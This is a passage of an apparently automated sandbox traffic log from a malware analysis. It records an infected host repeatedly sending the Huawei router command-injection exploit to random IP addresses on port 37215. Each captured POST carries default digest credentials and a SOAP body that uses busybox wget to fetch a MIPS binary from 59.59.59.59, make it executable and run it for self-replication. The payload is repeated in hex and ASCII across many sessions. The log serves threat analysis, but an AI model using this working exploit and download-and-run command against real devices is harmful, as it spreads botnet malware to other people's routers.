2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          634192.168.2.1541476197.44.124.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605537891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          635192.168.2.155843041.13.96.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610126972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          636192.168.2.155927674.250.109.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610150099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          637192.168.2.1552038197.240.31.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610162020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          638192.168.2.1538962157.132.221.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610450983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          639192.168.2.1547328197.76.12.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610501051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          640192.168.2.1534784101.37.17.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610518932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          641192.168.2.1544970157.76.233.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610805988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          642192.168.2.1545264178.8.194.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610918999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          643192.168.2.156046062.205.123.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610949039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          644192.168.2.1553190157.123.135.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.610968113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
